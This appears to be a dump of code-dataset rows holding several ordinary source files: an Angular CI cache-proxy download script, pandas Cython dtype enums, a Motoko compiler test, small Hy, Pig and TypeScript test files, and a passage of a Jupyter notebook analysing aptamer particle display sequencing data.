content stringlengths 4 1.04M | lang stringclasses 358 values | score int64 0 5 | repo_name stringlengths 5 114 | repo_path stringlengths 4 229 | repo_licenses listlengths 1 8 |
|---|---|---|---|---|---|
#!/bin/sh
# Download the bazel remote cache proxy binary and mark it executable.
# This is a temporary workaround until remote caching is no longer an
# experimental CircleCI feature. See remote cache documentation in
# /docs/BAZEL.md for details.
set -e
set -u
readonly DOWNLOAD_URL="https://5-116431813-gh.circle-artifacts.com/0/pkg/bazel-remote-proxy-$(uname -s)_$(uname -m)"
readonly TARGET="$HOME/bazel-remote-proxy"
curl --fail -o "$TARGET" "$DOWNLOAD_URL"
chmod +x "$TARGET"
| Shell | 4 | coreyscherbing/angular | .circleci/setup_cache.sh | [
"MIT"
] |
# Mapping of period attribute names to frequency abbreviations; the actual
# value is assigned in the accompanying implementation file.
cdef dict attrname_to_abbrevs
# Frequency-group codes: one base value per resolution, spaced 1000 apart
# so variant codes can be expressed as base + small offset (see the
# PeriodDtypeCode enum, which builds on these bases).
cdef enum c_FreqGroup:
# Mirrors FreqGroup in the .pyx file
FR_ANN = 1000
FR_QTR = 2000
FR_MTH = 3000
FR_WK = 4000
FR_BUS = 5000
FR_DAY = 6000
FR_HR = 7000
FR_MIN = 8000
FR_SEC = 9000
FR_MS = 10000
FR_US = 11000
FR_NS = 12000
FR_UND = -10000 # undefined
# Dtype codes for Period frequencies. The thousands digit selects the
# frequency group (annual=1000, quarterly=2000, ... nanosecond=12000) and
# the trailing digits select the variant (e.g. fiscal year end month).
cdef enum PeriodDtypeCode:
# Annual freqs with various fiscal year ends.
# eg, 2005 for A_FEB runs Mar 1, 2004 to Feb 28, 2005
A = 1000 # Default alias
A_DEC = 1000 # Annual - December year end
A_JAN = 1001 # Annual - January year end
A_FEB = 1002 # Annual - February year end
A_MAR = 1003 # Annual - March year end
A_APR = 1004 # Annual - April year end
A_MAY = 1005 # Annual - May year end
A_JUN = 1006 # Annual - June year end
A_JUL = 1007 # Annual - July year end
A_AUG = 1008 # Annual - August year end
A_SEP = 1009 # Annual - September year end
A_OCT = 1010 # Annual - October year end
A_NOV = 1011 # Annual - November year end
# Quarterly frequencies with various fiscal year ends.
# eg, Q42005 for Q_OCT runs Aug 1, 2005 to Oct 31, 2005
Q_DEC = 2000 # Quarterly - December year end
Q_JAN = 2001 # Quarterly - January year end
Q_FEB = 2002 # Quarterly - February year end
Q_MAR = 2003 # Quarterly - March year end
Q_APR = 2004 # Quarterly - April year end
Q_MAY = 2005 # Quarterly - May year end
Q_JUN = 2006 # Quarterly - June year end
Q_JUL = 2007 # Quarterly - July year end
Q_AUG = 2008 # Quarterly - August year end
Q_SEP = 2009 # Quarterly - September year end
Q_OCT = 2010 # Quarterly - October year end
Q_NOV = 2011 # Quarterly - November year end
M = 3000 # Monthly
W_SUN = 4000 # Weekly - Sunday end of week
W_MON = 4001 # Weekly - Monday end of week
W_TUE = 4002 # Weekly - Tuesday end of week
W_WED = 4003 # Weekly - Wednesday end of week
W_THU = 4004 # Weekly - Thursday end of week
W_FRI = 4005 # Weekly - Friday end of week
W_SAT = 4006 # Weekly - Saturday end of week
B = 5000 # Business days
D = 6000 # Daily
H = 7000 # Hourly
T = 8000 # Minutely
S = 9000 # Secondly
L = 10000 # Millisecondly
U = 11000 # Microsecondly
N = 12000 # Nanosecondly
UNDEFINED = -10_000
# Base class for pandas Period dtype objects; carries the resolved
# PeriodDtypeCode as a read-only attribute.
cdef class PeriodDtypeBase:
cdef readonly:
# Enum code identifying this dtype's frequency group and variant.
PeriodDtypeCode _dtype_code
| Cython | 4 | CJL89/pandas | pandas/_libs/tslibs/dtypes.pxd | [
"BSD-3-Clause"
] |
// Compiler test fixture: enumerates actor/shared-function forms; cases
// named ok_* are expected to compile, cases named bad_* are expected to
// be rejected as unsupported.
// top-level actor objects are supported
actor Counter {
flexible shared func bad_private_shared() { }; // unsupported private shared
public func ok_actorarg(a:actor{}) : async () {};
public func ok_functionarg(f:shared()->async ()) : async () {};
public func ok_oneway(){}; // supported oneway
public func ok() : async () {};
public func ok_explicit() : async () = async {};
public func ok_call() : async () {
ignore (ok()); // supported intercanister messaging
};
public func ok_await_call() : async () {
await (ok()); // supported intercanister messaging
};
public func ok_await() : async () {
let t : async () = loop {};
await t; // supported general await
};
public func ok_async() : async () {
let a = async { 1; }; // supported async
};
}
;
shared func bad_shared() { }; // unsupported non actor-member
do {
// shared function types are sharable
type wellformed_1 = shared (shared () -> ()) -> async ();
};
do {
// actors are shareable
type wellformed_2 = shared (actor {}) -> async ();
};
do {
actor class BadActorClass () { }; // no actor classes
};
do {
actor class BadActorClass (x : Int) { }; // no actor classes
};
// NOTE(review): bad_* names below suggest actors are rejected in nested
// expression positions — confirm against the expected-output file.
do {
let bad_non_top_actor : actor {} = if true actor {} else actor {};
};
do {
let bad_nested_actor = do { let _ = actor {}; ()};
};
actor BadSecondActor { };
// async functions not supported (inference mode)
func implicit_async() : async () { };
// anonymous shared functions not supported (inference and checking mode)
let _ = shared func() : async () { };
(shared func() : async () { }) : shared () -> async ();
| Modelica | 4 | olaszakos/motoko | test/run-drun/unsupported.mo | [
"Apache-2.0"
] |
;; Query http2bin.org over hyper's HTTP client and print this machine's
;; public IP address as reported by the service.
(import hyper json)
;; GET the given path from http2bin.org and decode the response body as JSON.
(defn http2bin [path]
(with [[conn (hyper.HTTPConnection "http2bin.org")]]
(.request conn "GET" path)
(-> (.get_response conn) (.read) (json.loads))))
;; NOTE(review): assumes the "/ip" response is an httpbin-style JSON object
;; with an "origin" key — confirm if the endpoint changes.
(-> (http2bin "/ip") (get "origin") (print))
| Hy | 3 | dhdavvie/hyper | examples/ip.hy | [
"MIT"
] |
-- Pass-through job: load the mail dataset from the ${in} path and write it
-- unchanged to ${out}, using the default PigStorage (tab-delimited) for both.
mail = load '${in}' using PigStorage();
store mail into '${out}' using PigStorage();
"Apache-2.0"
] |
import { element, by } from 'protractor';
import { AppPage } from './app.po';

// E2E smoke tests for the providers sample app.
describe('providers App', () => {
  let page: AppPage;

  // Start each spec from a freshly navigated app root.
  beforeEach(async () => {
    page = new AppPage();
    await page.navigateTo();
  });

  it('should display header that says Users list', async () => {
    const title = await page.getTitleText();
    expect(title).toEqual('Users list');
  });

  it('shows a list of customers', async () => {
    const listItems = element.all(by.css('app-root li'));
    const count = await listItems.count();
    const first = await listItems.get(0).getText();
    const last = await listItems.get(9).getText();
    expect(count).toBe(10);
    expect(first).toBe('1 Maria');
    expect(last).toBe('10 Seth');
  });
});
| TypeScript | 4 | John-Cassidy/angular | aio/content/examples/providers/e2e/src/app.e2e-spec.ts | [
"MIT"
] |
{
"cells": [
{
"metadata": {
"id": "DhWmZgAVwDGu",
"colab_type": "text"
},
"cell_type": "markdown",
"source": [
"Copyright 2021 Google LLC\n",
"\n",
"Licensed under the Apache License, Version 2.0 (the \"License\");\n",
"you may not use this file except in compliance with the License.\n",
"You may obtain a copy of the License at\n",
"\n",
" https://www.apache.org/licenses/LICENSE-2.0\n",
"\n",
"Unless required by applicable law or agreed to in writing, software\n",
"distributed under the License is distributed on an \"AS IS\" BASIS,\n",
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n",
"See the License for the specific language governing permissions and\n",
"limitations under the License."
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "-hbchNubOTea"
},
"source": [
"# Overview\n",
"\n",
"This notebook summarizes the numbers of aptamers that appear to be enriched in positive pools for particular particule display experiments. These values are turned into venn diagrams and pie charts in Figure 2. \n",
"\n",
"The inputs are csvs, where each row is an aptamer and columns indicate the sequencing counts within each particle display subexperiment.\n",
"\n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"cellView": "both",
"id": "e3ZmaXPJntva"
},
"outputs": [],
"source": [
"import matplotlib.pyplot as plt\n",
"import seaborn as sns\n",
"import numpy as np\n",
"import pandas as pd "
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "iwjz9suGO6mA"
},
"source": [
"# Parameters used in Manuscript\n",
"\n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"id": "0m_fyH1FO9Ce"
},
"outputs": [],
"source": [
"# Required coverage level for analysis. This is in units of number of apatamer \n",
"# particles (beads). This is used to minimize potential contamination. \n",
"# For example, a tolerated bead fraction of 0.2 means that if, based on read \n",
"# depth and number of beads, there are 100 reads expected per bead, then \n",
"# sequences with fewer than 20 reads would be excluded from analysis.\n",
"TOLERATED_BEAD_FRAC = 0.2 \n",
"\n",
"# Ratio cutoff between positive and negative pools to count as being real.\n",
"# The ratio is calculated normalized by read depth, so if the ratio is 0.5, \n",
"# then positive sequences are expected to have equal read depth (or more) in \n",
"# the positive pool as the negative pool. So, as a toy example, if the \n",
"# positive pool had 100 reads total and the negative pool had 200 reads total,\n",
"# then a sequence with 5 reads in the positive pool and 10 reads in the \n",
"# negative pool would have a ratio of 0.5.\n",
"POS_NEG_RATIO_CUTOFF = 0.5\n",
"\n",
"# Minimum required reads (when 0 it uses only the above filters)\n",
"MIN_READ_THRESH = 0"
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "SW2pi3B0hvTW"
},
"source": [
"# Load in data"
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "jTsPQUpjAVjP"
},
"source": [
"## Load in experimental conditions for Particle Display experiments\n",
"\n",
"The mlpd_params_df contains the experimental information for MLPD.\n",
"\n",
"Parameters are:\n",
"* apt_collected: The number of aptamer bead particles collected during the FACs experiment of particle display.\n",
"* apt_screened: The number of aptamer bead particles screened in order to get the apt_collected beads. \n",
"* seq_input: The estimated number of unique sequences in the input sequence library during bead construction."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"colab": {
"height": 138
},
"executionInfo": {
"elapsed": 356,
"status": "ok",
"timestamp": 1603828302117,
"user": {
"displayName": "",
"photoUrl": "",
"userId": ""
},
"user_tz": 420
},
"id": "jbCpKfz04mxN",
"outputId": "43123110-e7e6-48db-cf92-0fa4c79f1913"
},
"outputs": [
{
"data": {
"text/html": [
"\u003cdiv\u003e\n",
"\u003cstyle scoped\u003e\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"\u003c/style\u003e\n",
"\u003ctable border=\"1\" class=\"dataframe\"\u003e\n",
" \u003cthead\u003e\n",
" \u003ctr style=\"text-align: right;\"\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003eapt_screened\u003c/th\u003e\n",
" \u003cth\u003eapt_collected\u003c/th\u003e\n",
" \u003cth\u003eseq_input\u003c/th\u003e\n",
" \u003cth\u003econdition\u003c/th\u003e\n",
" \u003cth\u003econdition_flag\u003c/th\u003e\n",
" \u003cth\u003estringency\u003c/th\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/thead\u003e\n",
" \u003ctbody\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003e0\u003c/th\u003e\n",
" \u003ctd\u003e2400000.0\u003c/td\u003e\n",
" \u003ctd\u003e35000.0\u003c/td\u003e\n",
" \u003ctd\u003e100000\u003c/td\u003e\n",
" \u003ctd\u003eround2_high_no_serum_positive\u003c/td\u003e\n",
" \u003ctd\u003eround2_high_no_serum_flag\u003c/td\u003e\n",
" \u003ctd\u003eHigh\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003e1\u003c/th\u003e\n",
" \u003ctd\u003e2400000.0\u003c/td\u003e\n",
" \u003ctd\u003e85000.0\u003c/td\u003e\n",
" \u003ctd\u003e100000\u003c/td\u003e\n",
" \u003ctd\u003eround2_medium_no_serum_positive\u003c/td\u003e\n",
" \u003ctd\u003eround2_medium_no_serum_flag\u003c/td\u003e\n",
" \u003ctd\u003eMedium\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003e2\u003c/th\u003e\n",
" \u003ctd\u003e1240000.0\u003c/td\u003e\n",
" \u003ctd\u003e80000.0\u003c/td\u003e\n",
" \u003ctd\u003e100000\u003c/td\u003e\n",
" \u003ctd\u003eround2_low_no_serum_positive\u003c/td\u003e\n",
" \u003ctd\u003eround2_low_no_serum_flag\u003c/td\u003e\n",
" \u003ctd\u003eLow\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/tbody\u003e\n",
"\u003c/table\u003e\n",
"\u003c/div\u003e"
],
"text/plain": [
" apt_screened apt_collected ... condition_flag stringency\n",
"0 2400000.0 35000.0 ... round2_high_no_serum_flag High\n",
"1 2400000.0 85000.0 ... round2_medium_no_serum_flag Medium\n",
"2 1240000.0 80000.0 ... round2_low_no_serum_flag Low\n",
"\n",
"[3 rows x 6 columns]"
]
},
"execution_count": 3,
"metadata": {
"tags": []
},
"output_type": "execute_result"
}
],
"source": [
"#@title Original PD Data Parameters\n",
"\n",
"# Since these are small I'm going to embed in the colab.\n",
"apt_screened_list = [ 2.4*10**6, 2.4*10**6, 1.24*10**6]\n",
"apt_collected_list = [3.5 * 10**4, 8.5 * 10**4, 8 * 10**4]\n",
"seq_input = [10**5] * 3\n",
"conditions = ['round2_high_no_serum_positive', \n",
" 'round2_medium_no_serum_positive',\n",
" 'round2_low_no_serum_positive']\n",
"flags = ['round2_high_no_serum_flag', 'round2_medium_no_serum_flag', \n",
" 'round2_low_no_serum_flag']\n",
"stringency = ['High', 'Medium', 'Low']\n",
"\n",
"pd_param_df = pd.DataFrame.from_dict({'apt_screened': apt_screened_list,\n",
" 'apt_collected': apt_collected_list,\n",
" 'seq_input': seq_input,\n",
" 'condition': conditions,\n",
" 'condition_flag': flags,\n",
" 'stringency': stringency})\n",
"\n",
"pd_param_df"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"colab": {
"height": 168
},
"executionInfo": {
"elapsed": 311,
"status": "ok",
"timestamp": 1603828302739,
"user": {
"displayName": "",
"photoUrl": "",
"userId": ""
},
"user_tz": 420
},
"id": "HnXcw8Pg56Rw",
"outputId": "66916855-c76f-438d-a1aa-f14c1d2623f7"
},
"outputs": [
{
"data": {
"text/html": [
"\u003cdiv\u003e\n",
"\u003cstyle scoped\u003e\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"\u003c/style\u003e\n",
"\u003ctable border=\"1\" class=\"dataframe\"\u003e\n",
" \u003cthead\u003e\n",
" \u003ctr style=\"text-align: right;\"\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003eapt_screened\u003c/th\u003e\n",
" \u003cth\u003eapt_collected\u003c/th\u003e\n",
" \u003cth\u003eseq_input\u003c/th\u003e\n",
" \u003cth\u003econdition\u003c/th\u003e\n",
" \u003cth\u003econdition_flag\u003c/th\u003e\n",
" \u003cth\u003estringency\u003c/th\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/thead\u003e\n",
" \u003ctbody\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003e0\u003c/th\u003e\n",
" \u003ctd\u003e3283890.016\u003c/td\u003e\n",
" \u003ctd\u003e12204\u003c/td\u003e\n",
" \u003ctd\u003e200000\u003c/td\u003e\n",
" \u003ctd\u003eround1_very_positive\u003c/td\u003e\n",
" \u003ctd\u003eround1_very_flag\u003c/td\u003e\n",
" \u003ctd\u003eVery High\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003e1\u003c/th\u003e\n",
" \u003ctd\u003e6628573.952\u003c/td\u003e\n",
" \u003ctd\u003e50353\u003c/td\u003e\n",
" \u003ctd\u003e200000\u003c/td\u003e\n",
" \u003ctd\u003eround1_high_positive\u003c/td\u003e\n",
" \u003ctd\u003eround1_high_flag\u003c/td\u003e\n",
" \u003ctd\u003eHigh\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003e2\u003c/th\u003e\n",
" \u003ctd\u003e5801469.696\u003c/td\u003e\n",
" \u003ctd\u003e153845\u003c/td\u003e\n",
" \u003ctd\u003e200000\u003c/td\u003e\n",
" \u003ctd\u003eround1_medium_positive\u003c/td\u003e\n",
" \u003ctd\u003eround1_medium_flag\u003c/td\u003e\n",
" \u003ctd\u003eMedium\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003e3\u003c/th\u003e\n",
" \u003ctd\u003e3508412.512\u003c/td\u003e\n",
" \u003ctd\u003e201255\u003c/td\u003e\n",
" \u003ctd\u003e200000\u003c/td\u003e\n",
" \u003ctd\u003eround1_low_positive\u003c/td\u003e\n",
" \u003ctd\u003eround1_low_flag\u003c/td\u003e\n",
" \u003ctd\u003eLow\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/tbody\u003e\n",
"\u003c/table\u003e\n",
"\u003c/div\u003e"
],
"text/plain": [
" apt_screened apt_collected ... condition_flag stringency\n",
"0 3283890.016 12204 ... round1_very_flag Very High\n",
"1 6628573.952 50353 ... round1_high_flag High\n",
"2 5801469.696 153845 ... round1_medium_flag Medium\n",
"3 3508412.512 201255 ... round1_low_flag Low\n",
"\n",
"[4 rows x 6 columns]"
]
},
"execution_count": 4,
"metadata": {
"tags": []
},
"output_type": "execute_result"
}
],
"source": [
"#@title MLPD Data Parameters\n",
"apt_screened_list = [ 3283890.016, 6628573.952, 5801469.696, 3508412.512]\n",
"apt_collected_list = [12204, 50353, 153845, 201255]\n",
"seq_input = [200000] * 4\n",
"conditions = ['round1_very_positive', \n",
" 'round1_high_positive',\n",
" 'round1_medium_positive',\n",
" 'round1_low_positive']\n",
"flags = ['round1_very_flag', 'round1_high_flag', 'round1_medium_flag', \n",
" 'round1_low_flag']\n",
"stringency = ['Very High', 'High', 'Medium', 'Low']\n",
"mlpd_param_df = pd.DataFrame.from_dict({'apt_screened': apt_screened_list,\n",
" 'apt_collected': apt_collected_list,\n",
" 'seq_input': seq_input,\n",
" 'condition': conditions,\n",
" 'condition_flag': flags,\n",
" 'stringency': stringency})\n",
"\n",
"\n",
"mlpd_param_df"
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "vRpbBLF4tCLW"
},
"source": [
"## Load CSVs"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"colab": {
"height": 141
},
"executionInfo": {
"elapsed": 560997,
"status": "ok",
"timestamp": 1603828878626,
"user": {
"displayName": "",
"photoUrl": "",
"userId": ""
},
"user_tz": 420
},
"id": "jwACDCh9PMPl",
"outputId": "6b18aa03-545b-4ef4-eff3-4a9d2b34ec1c"
},
"outputs": [
{
"data": {
"text/html": [
"\n",
" \u003cinput type=\"file\" id=\"files-20b90a5d-83e9-4246-b161-06a94095f9bc\" name=\"files[]\" multiple disabled\n",
" style=\"border:none\" /\u003e\n",
" \u003coutput id=\"result-20b90a5d-83e9-4246-b161-06a94095f9bc\"\u003e\n",
" Upload widget is only available when the cell has been executed in the\n",
" current browser session. Please rerun this cell to enable.\n",
" \u003c/output\u003e\n"
],
"text/plain": [
"\u003cIPython.core.display.HTML at 0x7f4f50536860\u003e"
]
},
"metadata": {
"tags": []
},
"output_type": "display_data"
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"Saving mlpd_input_data_manuscript.csv to mlpd_input_data_manuscript.csv\n",
"Saving pd_clustered_input_data_manuscript.csv to pd_clustered_input_data_manuscript.csv\n",
"User uploaded file \"mlpd_input_data_manuscript.csv\" with length 24198752 bytes\n",
"User uploaded file \"pd_clustered_input_data_manuscript.csv\" with length 64368063 bytes\n"
]
}
],
"source": [
"# PD and MLPD sequencing counts across experiments\n",
"# Upload pd_clustered_input_data_manuscript.csv and mlpd_input_data_manuscript.csv\n",
"from google.colab import files\n",
"\n",
"uploaded = files.upload()\n",
"\n",
"for fn in uploaded.keys():\n",
" print('User uploaded file \"{name}\" with length {length} bytes'.format(\n",
" name=fn, length=len(uploaded[fn])))"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"id": "iw2osP0aj5i1"
},
"outputs": [],
"source": [
"# Load PD Data\n",
"with open('pd_clustered_input_data_manuscript.csv') as f:\n",
" pd_input_df = pd.read_csv(f)"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"id": "Zl1AGYd8O6MT"
},
"outputs": [],
"source": [
"# Load MLPD data\n",
"with open('mlpd_input_data_manuscript.csv') as f:\n",
" mlpd_input_df = pd.read_csv(f)"
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "rT_gewBxKvxE"
},
"source": [
"# Helper functions\n",
"\n",
"\n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"id": "JbUfkYM0m075"
},
"outputs": [],
"source": [
"def generate_cutoffs_via_PD_stats(df, col, apt_screened, apt_collected, seq_input,\n",
" tolerated_bead_frac, min_read_thresh):\n",
" \"\"\"Use the experimental parameters to determine sequences passing thresholds.\n",
"\n",
" Args:\n",
" df: Pandas dataframe with experiment results. Must have columns named \n",
" after the col function parameter, containing the read count, and a\n",
" column 'sequence'.\n",
" col: The string name of the column in the experiment dataframe with the \n",
" read count.\n",
" apt_screened: The integer number of aptamers screened, from the experiment \n",
" parameters.\n",
" apt_collected: The integer number of aptamers collected, from the experiment\n",
" parameters.\n",
" seq_input: The integer number of unique sequences in the sequence library \n",
" used to construct the aptamer particles.\n",
" tolerated_bead_frac: The float tolerated bead fraction threshold. In other\n",
" words, the sequencing depth required to keep a sequence, in units of\n",
" fractions of a bead based on the average expected read depth per bead. \n",
" min_read_threshold: The integer minimum number of reads that a sequence\n",
" must have in order not to be filtered.\n",
"\n",
" Returns:\n",
" Pandas series of the sequences from the dataframe that pass filter.\n",
" \"\"\"\n",
"\n",
" expected_bead_coverage = apt_screened / seq_input\n",
" tolerated_bead_coverage = expected_bead_coverage * tolerated_bead_frac\n",
" bead_full_min_sequence_coverage = (1. / apt_collected) * tolerated_bead_coverage\n",
" col_sum = df[col].sum()\n",
" # Look at sequenced counts calculated observed fraction of pool and raw count.\n",
" seqs = df[((df[col]/col_sum) \u003e bead_full_min_sequence_coverage) \u0026 # Pool frac.\n",
" (df[col] \u003e min_read_thresh) # Raw count\n",
" ].sequence\n",
" return seqs\n",
"\n",
"\n",
"def generate_pos_neg_normalized_ratio(df, col_prefix):\n",
" \"\"\"Adds fraction columns to the dataframe with the calculated pos/neg ratio.\n",
"\n",
" Args:\n",
" df: Pandas dataframe, expected to have columns [col_prefix]_positive and\n",
" [col_prefix]_negative contain read counts for the positive and negative\n",
" selection conditions, respectively.\n",
" col_prefix: String prefix of the columns to use to calculate the ratio. \n",
" For example 'round1_very_positive'.\n",
" \n",
" Returns:\n",
" The original dataframe with three new columns:\n",
" [col_prefix]_positive_frac contains the fraction of the total positive \n",
" pool that is this sequence.\n",
" [col_prefix]_negative_frac contains the fraction of the total negative\n",
" pool that is this sequence.\n",
" [col_prefix]_pos_neg_ratio: The read-depth normalized fraction of the \n",
" sequence that ended in the positive pool.\n",
" \"\"\"\n",
" col_pos = col_prefix + '_' + 'positive'\n",
" col_neg = col_prefix + '_' + 'negative'\n",
" df[col_pos + '_frac'] = df[col_pos] / df[col_pos].sum()\n",
" df[col_neg + '_frac'] = df[col_neg] / df[col_neg].sum()\n",
" df[col_prefix + '_pos_neg_ratio'] = df[col_pos + '_frac'] / (\n",
" df[col_pos + '_frac'] + df[col_neg + '_frac'])\n",
" return df\n",
"\n",
"\n",
"def build_seq_sets_from_df (input_param_df, input_df, tolerated_bead_frac, \n",
" pos_neg_ratio, min_read_thresh):\n",
" \"\"\"Sets flags for sequences based on whether they clear stringencies.\n",
"\n",
" This function adds a column 'seq_set' to the input_param_df (one row per\n",
" stringency level of a particle display experiment) containing all the \n",
" sequences in the experiment that passed that stringency level in the \n",
" experiment.\n",
"\n",
" Args:\n",
" input_param_df: Pandas dataframe with experimental parameters. Expected\n",
" to have one row per stringency level in the experiment and \n",
" columns 'apt_screened', 'apt_collected', 'seq_input', 'condition', and\n",
" 'condition_flag'.\n",
" input_df: Pandas dataframe with the experimental results (counts per \n",
" sequence) for the experiment covered in the input_param_df. Expected\n",
" to have a [col_prefix]_pos_neg_ratio column for each row of the\n",
" input_param_df (i.e. each stringency level).\n",
" tolerated_bead_frac: Float representing the minimum sequence depth, in\n",
" units of expected beads, for a sequence to be used in analysis.\n",
" pos_neg_ratio: The threshold for the pos_neg_ratio column for a sequence\n",
" to be used in the analysis.\n",
" min_read_thresh: The integer minimum number of reads for a sequence to\n",
" be used in the analysis (not normalized, a straight count.)\n",
"\n",
" Returns:\n",
" Nothing.\n",
"\n",
" \"\"\"\n",
" for _, row in input_param_df.iterrows():\n",
" \n",
" # Get parameters to calculate bead fraction.\n",
" apt_screened = row['apt_screened']\n",
" apt_collected = row['apt_collected']\n",
" seq_input = row['seq_input']\n",
" condition = row['condition']\n",
" flag = row['condition_flag']\n",
" \n",
" # Get sequences above tolerated_bead_frac in positive pool.\n",
" tolerated_bead_frac_seqs = generate_cutoffs_via_PD_stats(\n",
" input_df, condition, apt_screened, apt_collected, seq_input, \n",
" tolerated_bead_frac, min_read_thresh)\n",
" \n",
" # Intersect with seqs \u003e normalized positive sequencing count ratio.\n",
" condition_pre = condition.split('_positive')[0]\n",
" ratio_col = '%s_pos_neg_ratio' % (condition_pre)\n",
" pos_frac_seqs = input_df[input_df[ratio_col] \u003e pos_neg_ratio].sequence\n",
" seqs = set(tolerated_bead_frac_seqs) \u0026 set(pos_frac_seqs)\n",
" input_df[flag] = input_df.sequence.isin(set(seqs))"
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "VQJaU2bzJh0V"
},
"source": [
"# Data Analysis"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"id": "ftmm7zPcD_fK"
},
"outputs": [],
"source": [
"#@title Add positive_frac / (positive_frac + negative_frac) col to df\n",
"\n",
"for col_prefix in ['round1_very', 'round1_high', 'round1_medium', 'round1_low']:\n",
" mlpd_input_df = generate_pos_neg_normalized_ratio(mlpd_input_df, col_prefix)\n",
" \n",
"\n",
"for col_prefix in ['round2_high_no_serum', 'round2_medium_no_serum', 'round2_low_no_serum']:\n",
" pd_input_df = generate_pos_neg_normalized_ratio(pd_input_df, col_prefix)"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"id": "hR2FvzJoyYFl"
},
"outputs": [],
"source": [
"#@title Measure consistency of particle display data when increasing stringency thresholds within each experimental set (i.e PD and MLPD)\n",
"\n",
"build_seq_sets_from_df(pd_param_df, pd_input_df, TOLERATED_BEAD_FRAC, \n",
" POS_NEG_RATIO_CUTOFF, MIN_READ_THRESH)\n",
"\n",
"build_seq_sets_from_df(mlpd_param_df, mlpd_input_df, TOLERATED_BEAD_FRAC, \n",
" POS_NEG_RATIO_CUTOFF, MIN_READ_THRESH)"
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "5HQNo-kJiJIj"
},
"source": [
"# Generate Figure Data\n",
"Here, we generate the raw data used to build Venn diagrams. The final figures were render in Figma."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"colab": {
"height": 318
},
"executionInfo": {
"elapsed": 605,
"status": "ok",
"timestamp": 1603828883222,
"user": {
"displayName": "",
"photoUrl": "",
"userId": ""
},
"user_tz": 420
},
"id": "NpkpSTK-gJxB",
"outputId": "f30608df-5e01-465a-e13f-f3287c0c06a1"
},
"outputs": [
{
"data": {
"text/html": [
"\u003cdiv\u003e\n",
"\u003cstyle scoped\u003e\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"\u003c/style\u003e\n",
"\u003ctable border=\"1\" class=\"dataframe\"\u003e\n",
" \u003cthead\u003e\n",
" \u003ctr style=\"text-align: right;\"\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003esequence\u003c/th\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eround2_low_no_serum_flag\u003c/th\u003e\n",
" \u003cth\u003eround2_medium_no_serum_flag\u003c/th\u003e\n",
" \u003cth\u003eround2_high_no_serum_flag\u003c/th\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/thead\u003e\n",
" \u003ctbody\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"4\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e908587\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e44\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e27\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e3\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
